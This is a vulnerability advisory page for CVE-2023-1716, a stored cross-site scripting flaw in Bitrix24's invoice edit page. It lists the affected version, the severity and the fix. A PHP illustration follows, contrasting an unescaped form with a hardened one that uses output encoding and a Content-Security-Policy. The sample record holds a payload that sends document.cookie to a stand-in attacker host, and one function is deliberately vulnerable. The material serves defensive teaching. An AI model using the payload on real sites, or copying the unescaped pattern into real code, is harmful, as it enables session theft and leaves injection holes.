First published: Wed Nov 01 2023
Cross-site scripting (XSS) vulnerability in Invoice Edit Page in Bitrix24 22.0.300 allows attackers to execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege.
Credit: info@starlabs.sg
Affected Software | Affected Version | How to fix
---|---|---
Bitrix24 | = 22.0.300 | Update to a patched release (see below)
CVE-2023-1716 is a cross-site scripting (XSS) vulnerability in the Invoice Edit Page of Bitrix24 22.0.300.
Exploiting it lets an attacker run arbitrary JavaScript in the victim's browser; if the victim is an administrator, this can be escalated to executing arbitrary PHP code on the server.
CVE-2023-1716 has a CVSS base score of 9.0, which is rated Critical.
To fix CVE-2023-1716, update Bitrix24 to version 22.0.301 or later.
You can find more information about CVE-2023-1716 on the Star Labs advisory page: https://starlabs.sg/advisories/23/23-1716/
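The advisory above names the class of bug (an XSS in an edit form) but not the affected field or the exact payload. The following is an added illustration, written for this page and not taken from Bitrix24's source or the Star Labs advisory, of how such a flaw typically arises in a PHP-rendered edit page and how it is fixed. The record layout, field names, URL path and the payload are all hypothetical; the example covers only the browser-side part of the chain, not the admin-to-PHP escalation the advisory mentions.

```php
<?php
// Added illustration (hypothetical code, NOT Bitrix24's source): how an XSS in an
// invoice edit form typically arises, and the hardened equivalent.
declare(strict_types=1);

// Constructed sample record, as if loaded from the database. Assume the attacker
// controlled the "comment" field when the invoice was created (e.g. via a
// customer-facing form), so the payload is stored and fires on every edit view.
$invoice = [
    'id'      => 4711,
    'title'   => 'Consulting, October',
    'comment' => '"><img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

// VULNERABLE: stored values are interpolated into the form unescaped. The payload
// closes the value="" attribute and injects an element with an inline handler that
// runs in the browser of whoever opens the edit page (an administrator, at worst).
function renderEditFormVulnerable(array $inv): string
{
    return '<form method="post" action="/crm/invoice/edit/' . $inv['id'] . '/">'
         . '<input name="title" value="' . $inv['title'] . '">'
         . '<input name="comment" value="' . $inv['comment'] . '">'
         . '</form>';
}

// HARDENED: every dynamic value is encoded for the HTML context it lands in.
// ENT_QUOTES encodes both " and ' so attribute values cannot be terminated early;
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently producing an empty string.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderEditFormSafe(array $inv): string
{
    return '<form method="post" action="/crm/invoice/edit/' . (int) $inv['id'] . '/">'
         . '<input name="title" value="' . e($inv['title']) . '">'
         . '<input name="comment" value="' . e($inv['comment']) . '">'
         . '</form>';
}

// Defence in depth: a CSP without 'unsafe-inline' stops inline handlers such as
// onerror= from executing even if an encoding bug slips through. It must be sent
// before any output (in CLI mode header() is a no-op).
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");

echo renderEditFormSafe($invoice), PHP_EOL;
// For comparison only; never ship this branch:
// echo renderEditFormVulnerable($invoice), PHP_EOL;
```

Running the script prints the hardened form, in which the quote and angle brackets of the stored comment appear as `&quot;`, `&gt;` and `&lt;`, so the browser treats the whole payload as the attribute's text. Uncommenting the vulnerable branch shows the same record breaking out of the attribute. The fix is the same whether the XSS is stored or reflected: encode at the point of output for the exact context (attribute, element body, URL, JavaScript string), and add a CSP so a single missed encoding is not enough for script execution.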